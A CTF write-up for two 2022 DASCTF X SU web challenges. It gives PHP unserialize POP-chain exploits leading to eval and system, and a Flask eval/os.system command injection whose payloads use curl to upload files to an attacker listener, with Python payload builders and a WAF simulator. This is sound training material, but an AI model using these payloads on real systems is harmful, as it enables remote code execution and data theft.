2022DASCTF X SU March Spring Challenge (web)

ezpop

<?php

class crow
{
    public $v1;
    public $v2;
    function eval() {
        echo new $this->v1($this->v2);
    }
    public function __invoke()
    {
        $this->v1->world();
    }
}
class fin
{
    public $f1;
    public function __destruct()
    {
        echo $this->f1 . '114514';
    }
    public function run()
    {
        ($this->f1)();
    }
    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}
class what
{
    public $a;
    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;
    public function run()
    {
        ($this->m1)();
    }
    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}
if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

The entry point is fin::__destruct(), which runs as soon as the object returned by unserialize() is discarded, and the target is mix::get_flag(), whose eval('#' . $this->m1) executes attacker-controlled code.

The only place get_flag() is called is fin::__call(), so the chain has to call a method that does not exist on a fin object.

crow::__invoke() does exactly that: it calls $this->v1->world(), and no class defines world(), so with v1 set to a fin object the call lands in fin::__call(). __invoke() itself fires when the object is called as a function, and there are two run() methods that do this: fin::run() with ($this->f1)() and mix::run() with ($this->m1)(). Either is reachable from what::__toString(), which fin::__destruct() triggers by concatenating $this->f1 with '114514'.

So this challenge has two chains.

Chain 1

Flow:

start -> fin::__destruct() -> what::__toString() -> fin::run() -> crow::__invoke() -> fin::__call() -> mix::get_flag()

In get_flag() the code is eval('#' . $this->m1), so the first line is commented out. A PHP single-line comment also ends at ?>, so m1 = '?><?php eval($_POST[1]);' drops out of PHP mode, re-enters it with <?php and runs the inner eval on the second POST parameter. The other fin objects are destructed afterwards and their echo $this->f1 . '114514' throws because crow and mix have no __toString(), but that fatal error only appears after the command has already run.

exp:

<?php
// Chain 1: fin::__destruct -> what::__toString -> fin::run -> crow::__invoke -> fin::__call -> mix::get_flag
// Only the properties the chain touches are declared; the methods are not needed to serialize.
class crow{
    public $v1;
}

class fin{
    public $f1;
}
class what
{
    public $a;
}
class mix
{
    // eval('#' . $m1): '?>' ends the '#' comment by leaving PHP mode, '<?php' re-enters it
    public $m1='?><?php eval($_POST[1]);';
}

$F1 = new fin();   // outermost object: its __destruct() starts the chain
$F2 = new fin();
$F3 = new fin();
$c = new crow();
$w = new what();
$m = new mix();

$F1->f1 = $w;      // echo $w . '114514' -> what::__toString()
$w->a   = $F2;     // $this->a->run() -> fin::run()
$F2->f1 = $c;      // ($this->f1)() -> crow::__invoke()
$c->v1  = $F3;     // $this->v1->world() -> no such method -> fin::__call()
$F3->f1 = $m;      // $this->f1->get_flag() -> mix::get_flag()
echo serialize($F1);
?>

payload:

cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":1:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:24:"?><?php eval($_POST[1]);";}}}}}}
&1=system('cat H0mvz850F.php');

Chain 2

Flow:

start -> fin::__destruct() -> what::__toString() -> mix::run() -> crow::__invoke() -> fin::__call() -> mix::get_flag()

The only difference is that what::$a now holds a mix object, so the ($this->m1)() call in mix::run() invokes the crow; a second mix object with the default m1 sits at the end of the chain for get_flag().

exp:

<?php
// Chain 2: fin::__destruct -> what::__toString -> mix::run -> crow::__invoke -> fin::__call -> mix::get_flag
class crow{
    public $v1;
}

class fin{
    public $f1;
}
class what
{
    public $a;
}
class mix
{
    public $m1='?><?php eval($_POST[1]);';
}

$F1 = new fin();   // outermost object: its __destruct() starts the chain
$F2 = new fin();
$c = new crow();
$w = new what();
$m = new mix();    // used for mix::run(); its m1 is overwritten with the crow below
$m2= new mix();    // keeps the default m1; this is the one whose get_flag() runs

$F1->f1 = $w;      // echo $w . '114514' -> what::__toString()
$w->a   = $m;      // $this->a->run() -> mix::run()
$m->m1  = $c;      // ($this->m1)() -> crow::__invoke()
$c->v1  = $F2;     // $this->v1->world() -> no such method -> fin::__call()
$F2->f1 = $m2;     // $this->f1->get_flag() -> mix::get_flag()
echo serialize($F1);
?>

payload:

cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":1:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:24:"?><?php eval($_POST[1]);";}}}}}}
&1=system('cat H0mvz850F.php');
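The same two chains built in Python rather than with PHP's serialize(), as an added example that is not part of the original writeup: it spells out the object format unserialize() consumes and checks that the nested structures above produce the cmd= strings shown. The class and property names are the challenge's; STUB is the exp scripts' m1 value, and post_body() assumes the usual application/x-www-form-urlencoded encoding of the POST request.

```python
# Added example, not from the writeup: build the two ezpop POP-chain payloads
# without PHP. Format produced: O:<len>:"<class>":<n>:{<prop><value>...}
# Class and property names are the challenge's; STUB is the exp scripts' m1.
from urllib.parse import urlencode

# '#' comments out the rest of the line inside eval(); '?>' leaves PHP mode
# (ending the comment) and '<?php' re-enters it, so the inner eval runs.
STUB = "?><?php eval($_POST[1]);"


def php_str(s: str) -> str:
    """Serialize a PHP string. The length field counts bytes, not characters."""
    return f's:{len(s.encode("utf-8"))}:"{s}";'


def php_obj(cls: str, props: dict) -> str:
    """Serialize an object whose properties are all public.

    Protected/private properties would need NUL-wrapped name prefixes; this
    challenge declares everything public, so plain names are enough.
    """
    body = "".join(php_str(name) + value for name, value in props.items())
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'


def chain1() -> str:
    """fin::__destruct -> what::__toString -> fin::run -> crow::__invoke -> fin::__call -> mix::get_flag"""
    mix = php_obj("mix", {"m1": php_str(STUB)})
    fin3 = php_obj("fin", {"f1": mix})      # __call: $this->f1->get_flag()
    crow = php_obj("crow", {"v1": fin3})    # __invoke: $this->v1->world()
    fin2 = php_obj("fin", {"f1": crow})     # run: ($this->f1)()
    what = php_obj("what", {"a": fin2})     # __toString: $this->a->run()
    return php_obj("fin", {"f1": what})     # __destruct: echo $this->f1 . '114514'


def chain2() -> str:
    """fin::__destruct -> what::__toString -> mix::run -> crow::__invoke -> fin::__call -> mix::get_flag"""
    mix2 = php_obj("mix", {"m1": php_str(STUB)})
    fin2 = php_obj("fin", {"f1": mix2})
    crow = php_obj("crow", {"v1": fin2})
    mix1 = php_obj("mix", {"m1": crow})     # run: ($this->m1)()
    what = php_obj("what", {"a": mix1})
    return php_obj("fin", {"f1": what})


def post_body(chain: str, php: str) -> str:
    """Form body for the challenge: cmd=<payload>&1=<code for the inner eval>."""
    return urlencode({"cmd": chain, "1": php})


if __name__ == "__main__":
    print(chain1())
    print(chain2())
    print(post_body(chain1(), "system('cat H0mvz850F.php');"))
```

Because the length prefix is in bytes, php_str() encodes before measuring; with pure-ASCII stubs that makes no difference, but it is the usual reason a hand-edited payload stops unserializing.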

calc

The challenge ships an attachment:

app.py

#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time

app=Flask(__name__)

def waf(s):
    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag= False
            print(no)
            break
    return flag
    

@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")

@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
    
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"

    

if __name__ == "__main__":
    app.run(host='0.0.0.0',port=5000)

The /calc route reads the num parameter, formats it unquoted into the shell command in log, and then runs

data = eval(num)
os.system(log)

so whatever is in num ends up inside a shell command, and arbitrary commands can be executed.

Two constraints shape the payload. num has to pass waf(), which rejects spaces, parentheses, underscores, double quotes, braces, ;, |, & and a list of Python names, so %09 (tab) stands in for spaces. And eval(num) has to succeed: os.system(log) comes after it inside the same try, so a SyntaxError skips the shell entirely (the bare except then leaves data undefined and the request fails on str(data)). A leading 1# satisfies both: eval() sees the integer 1 followed by a comment, and the comment text is still handed to the shell inside the echo line.

One caveat on the shell side: a POSIX shell treats # as a comment only at the start of a word, so in the echo line 1#curl is a single argument and nothing after it is a command on its own. The shell has to expand something inside that word; backtick command substitution is not on the blacklist, and the backticks around curl ... and around ls / cat Th1s* were most likely stripped when the post was rendered, so the payloads below are assumed to have carried them. Output is collected through the app's own log file: echo ... > ./tmp/log.txt writes the substituted command output into tmp/log.txt, and curl -F xx=@tmp/log.txt uploads that file to the attacker's listener (http://ip:5678/, ip being the listener's address). Since the upload happens before the redirect truncates the file, each request exfiltrates the log.txt left by the previous one, which is why ls is sent first and cat Th1s* second:

?num=1%23curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://ip:5678/%23ls

?num=1%23curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://ip:5678/%23cat%09Th1s*
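A local reproduction of how the calc route handles num, added here as an example and not part of the writeup or of the challenge: waf() is copied from app.py, build_log() formats the same command app.py passes to os.system() (it is never executed here), and simulate() runs them in the app's order so a candidate payload can be checked offline. The ip and timestamp are constructed stand-ins for request.remote_addr and time.strftime(); the three inputs at the bottom are constructed from the first payload above. shell_words() tokenizes the resulting command the way a POSIX shell splits words, which makes the "#-inside-a-word" caveat visible.

```python
# Added example, not from the writeup: replay the calc route's checks locally.
# waf() is the challenge's; build_log() builds the os.system() string but
# nothing here runs a shell. ip/timestamp are constructed stand-ins.
import shlex

BLACKLIST = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&',
             'getattr', 'os', 'system', 'class', 'subclasses', 'mro', 'request',
             'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen',
             'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local',
             'self', 'item', 'getitem', 'getattribute', 'func_globals',
             '__init__', 'join', '__dict__']


def waf(s: str) -> bool:
    """The challenge's check: any blacklisted substring (case-insensitive) rejects num."""
    return not any(no.lower() in s.lower() for no in BLACKLIST)


def build_log(num: str, ip: str = "127.0.0.1", when: str = "20220326-120000") -> str:
    """Same format string as app.py; num lands unquoted in the middle of an echo."""
    return "echo {0} {1} {2}> ./tmp/log.txt".format(when, ip, num)


def simulate(num: str) -> dict:
    """Mirror app.py's order: waf first, then eval(); report what would happen.

    eval() is deliberately the same call the challenge makes, on our own
    constructed input. os.system() only runs after a successful eval, so a num
    that is not a valid Python expression never reaches the shell (the bare
    except then leaves data unset and the request fails on str(data)).
    """
    if not waf(num):
        return {"waf": False, "eval": None, "error": None, "shell": None}
    try:
        data = eval(num)  # reproducing the challenge on our own input
    except Exception as exc:
        return {"waf": True, "eval": None, "error": type(exc).__name__, "shell": None}
    return {"waf": True, "eval": data, "error": None, "shell": build_log(num)}


def shell_words(num: str) -> list:
    """Split the command as a POSIX shell splits words (tab counts as whitespace).

    '#' starts a shell comment only at the start of a word, so '1#curl' is one
    argument to echo; for the shell to execute anything from inside that word
    it needs an expansion that works within a word. Backtick command
    substitution is not on the blacklist; whether the original payload used it
    is an assumption, since rendering may have stripped the backticks.
    """
    return shlex.split(build_log(num))


# Constructed inputs: the writeup's first payload with %09/%23 decoded, the
# same with real spaces (rejected by waf), and a newline variant (eval fails).
TAB_PAYLOAD = "1#curl\t-X\tGET\t-F\txx=@tmp/log.txt\thttp://ip:5678/#ls"
SPACE_PAYLOAD = "1#curl -X GET -F xx=@tmp/log.txt http://ip:5678/#ls"
NEWLINE_PAYLOAD = "1\ncurl\t-X\tGET\t-F\txx=@tmp/log.txt\thttp://ip:5678/\nls"

if __name__ == "__main__":
    for p in (TAB_PAYLOAD, SPACE_PAYLOAD, NEWLINE_PAYLOAD):
        print(repr(p), "->", simulate(p))
    print(shell_words(TAB_PAYLOAD))
```

The newline variant is the one people try first because a newline separates commands in the shell; simulate() shows why it cannot work here: eval() rejects a second line, so os.system() is never reached. The # form is the only way to keep both parsers happy, and the tokenization shows what the shell then actually receives.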
